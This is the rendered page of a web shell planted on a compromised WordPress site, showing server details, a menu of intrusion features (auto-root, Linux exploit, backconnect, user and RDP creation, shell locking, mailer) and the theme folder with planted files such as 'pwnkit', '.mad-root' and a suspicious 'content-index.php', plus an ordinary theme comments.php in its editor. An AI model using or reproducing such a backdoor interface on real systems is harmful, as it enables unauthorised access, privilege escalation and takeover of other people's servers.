Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
busiprof /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
functions
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
840
B
-rw-r--r--
Page-fullwidth.php
694
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
2.15
KB
-rw-r--r--
author.php
1.71
KB
-rw-r--r--
category.php
1.77
KB
-rw-r--r--
comments.php
3.56
KB
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
content.php
1.37
KB
-rw-r--r--
footer.php
961
B
-rw-r--r--
front-page.php
922
B
-rw-r--r--
functions.php
2.82
KB
-rw-r--r--
functionsbak.php
2.34
KB
-rw-r--r--
header.php
1.93
KB
-rw-r--r--
index-bannerstrip.php
898
B
-rw-r--r--
index-projects.php
5.53
KB
-rw-r--r--
index-services.php
5
KB
-rw-r--r--
index-slider.php
1.14
KB
-rw-r--r--
index-testimonials.php
4.26
KB
-rw-r--r--
index.php
1.01
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
page.php
1.28
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
8.83
KB
-rw-r--r--
screenshot.png
390.92
KB
-rw-r--r--
search.php
1.37
KB
-rw-r--r--
searchform.php
598
B
-rw-r--r--
sidebar-woocommerce.php
314
B
-rw-r--r--
sidebar.php
191
B
-rw-r--r--
single.php
1.11
KB
-rw-r--r--
style.css
34.66
KB
-rw-r--r--
tag.php
1.76
KB
-rw-r--r--
theme_setup_data.php
9.25
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments.php
<?php /* * @file comment.php * @package Busiprof * @author Priyanshu Mittal * @copyright 2013 Webrit * @license license.txt * @filesource wp-content/themes/Busiprof/comment.php */ ?> <?php if ( post_password_required() ) : ?> <p class="nopassword"><?php _e( 'This post is password protected. Enter the password to view any comments.', 'busiprof' ); ?></p> <?php return;endif;?> <?php if ( have_comments() ) : ?> <div class="comments-area"> <h3><?php _e('Comment','busiprof');?> <span>(<?php echo get_comments_number();?>)</span></h3> <?php if ( get_comment_pages_count() > 1 && get_option( 'page_comments' ) ) : ?> <nav id="comment-nav-above"> <h1 class="assistive-text"><?php _e( 'Comment navigation', 'busiprof' ); ?></h1> <div class="nav-previous"><?php previous_comments_link( __( '← Older Comments', 'busiprof' ) ); ?></div> <div class="nav-next"><?php next_comments_link( __( 'Newer Comments →', 'busiprof' ) ); ?></div> </nav> <?php endif; ?> <?php wp_list_comments( array( 'callback' => 'busiprof_comment' ) ); ?> <!-- comment_mn --> </div> <?php if ( get_comment_pages_count() > 1 && get_option( 'page_comments' ) ) : // are there comments to navigate through ?> <nav id="comment-nav-below"> <h1 class="assistive-text"><?php _e( 'Comment navigation', 'busiprof' ); ?></h1> <div class="nav-previous"><?php previous_comments_link( __( '← Older Comments', 'busiprof' ) ); ?></div> <div class="nav-next"><?php next_comments_link( __( 'Newer Comments →', 'busiprof' ) ); ?></div> </nav> <?php endif; ?> <?php elseif ( ! comments_open() && ! is_page() && post_type_supports( get_post_type(), 'comments' ) ) : ?> <?php endif; ?> <?php if ('open' == $post->comment_status) : ?> <?php if ( get_option('comment_registration') && !$user_ID ) : ?> <p><?php _e("You must be",'busiprof')?> <a href="<?php echo get_option('siteurl'); ?>/wp-login.php?redirect_to=<?php echo urlencode(get_permalink()); ?>"><?php _e("logged in",'busiprof')?></a> <?php _e("to post a comment",'busiprof')?></p> <?php else : ?> <div class="comment-form"> <div class="row"> <?php $fields=array( 'author' => '<div class="form-group col-xs-6"><input name="author" id="author" value="" type="text" placeholder="Your name" /></div>', 'email' => '<div class="form-group col-xs-6"><input name="email" id="email" value="" type="text" placeholder="Your Email Id"></div>', ); function my_fields($fields) { return $fields; } add_filter('comment_form_default_fields','my_fields'); $defaults = array( 'fields' => apply_filters( 'comment_form_default_fields', $fields ), 'comment_field' => '<div class="form-group col-xs-12"><textarea rows="5" id="comment" name="comment" type="text" placeholder="Message" rows="3"></textarea></div>', 'logged_in_as' => '<div class="col-xs-12"><p class="logged-in-as">' . __( "Logged in as ",'busiprof' ).'<a href="'. admin_url( 'profile.php' ).'">'.$user_identity.'</a>'. '<a href="'. wp_logout_url( get_permalink() ).'" title="Log out of this account">'.__(" Log out?",'busiprof').'</a>' . '</p></div>', 'id_submit' => 'submit_btn', 'label_submit' =>__( 'Submit Now','busiprof'), 'comment_notes_after' => '', 'title_reply' => '<div class="col-xs-12"><h3 class="comment-title">' . __( 'Leave a Comment','busiprof') .'</h3></div>', 'id_form' => 'action' ); comment_form($defaults); ?></div> </div><!-- leave_comment_mn --> <?php endif; // If registration required and not logged in ?> <?php endif; ?>
Close